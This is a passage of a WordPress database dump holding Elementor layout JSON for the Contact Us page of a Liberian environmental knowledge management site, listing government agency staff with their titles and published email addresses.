,\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Agricultural Economist<br \\/>MOA<br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jlopleh Dennis Wiagbe <\\/strong><br \\/>Director\\/M&amp;E<br \\/>MOA<br \\/><a href=\\\"mailto:jdmne12@gmail.com\\\">jdmne12@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Halala Willie Kokulo <\\/strong><br \\/>Director\\/Crop Resources<br \\/>MOA<br \\/><a href=\\\"mailto:kokulohalala@gmail.com\\\">kokulohalala@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"755c46b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"399f512\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"49c1380\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4032246\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"2179c05\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7f527f1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"713d262\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d8cbd31\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"05b84b5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9540449\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Roosevelt Carlos Reeves <\\/strong><br \\/>Agricultural Mechanization Technologist<br \\/>MOA<br \\/><a href=\\\"mailto:rcreeves@gmail.com\\\">rcreeves@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cfc0f42\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"baed7dc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c5f9301\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b97200c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager<br \\/>LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Aaron S.M. Wesseh<\\/strong><br \\/>Manager<br \\/>Cross-Cutting Capacity Development Project<br \\/>EPA<br \\/><a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director<br \\/>Division of Foreign Trade<br \\/>MOCI<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer<br \\/>National Standard Laboratory<br \\/>MOCI<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards<br \\/>Bureau of Industrial Services<br \\/>MOCI<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer<br \\/>MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>S. Ahmed Sheriff <\\/strong><br \\/>Director<br \\/>Department of Marine Fisheries and Environment<br \\/>NaFAA<br \\/><a href=\\\"sasherif@nafaa.gov.lr\\\">sasherif@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea090e8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Anthony A. Yokie<\\/strong>\\nManager\\nDepartment of Marine Fisheries and Environment\\nNaFAA\\n<a href=\\\"mailto:ayokie@nafaa.gov.lr\\\">ayokie@nafaa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Martin Killen <\\/strong><br \\/>IT Officer<br \\/>NaFAA<br \\/><a href=\\\"mailto:maskillen@nafaa.gov.lr\\\">maskillen@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce W. Kumeh<\\/strong><br \\/>Coastal Zone Supervisor<br \\/>NaFAA<br \\/><a href=\\\"mailto:jkumeh@nafaa.gov.lr\\\">jkumeh@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aca08f0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"08c437c\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc69fab\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"625a74e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/02\\/nafaa.png\",\"id\":3520}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"aff1f4a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3690a1d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b216801\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6cccf87\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6a59ec5\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23ca2d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9bf0510\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Urias B. Barclay<\\/strong><br \\/>Environmental Technician<br \\/>NaFAA<br \\/><a href=\\\"mailto:ubbarclay@gmail.com\\\">ubbarclay@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a0aec03\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e162bb8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9bce89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"593819f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3ef1bd5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"334f9e9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(24412,3599,'_elementor_edit_mode','builder'),(24413,3599,'_elementor_template_type','wp-page'),(24414,3599,'_elementor_version','3.0.16'),(24415,3599,'_wp_page_template','default'),(24416,3599,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer<br \\/>UNCBD Focal Point<br \\/>EPA<br \\/><a 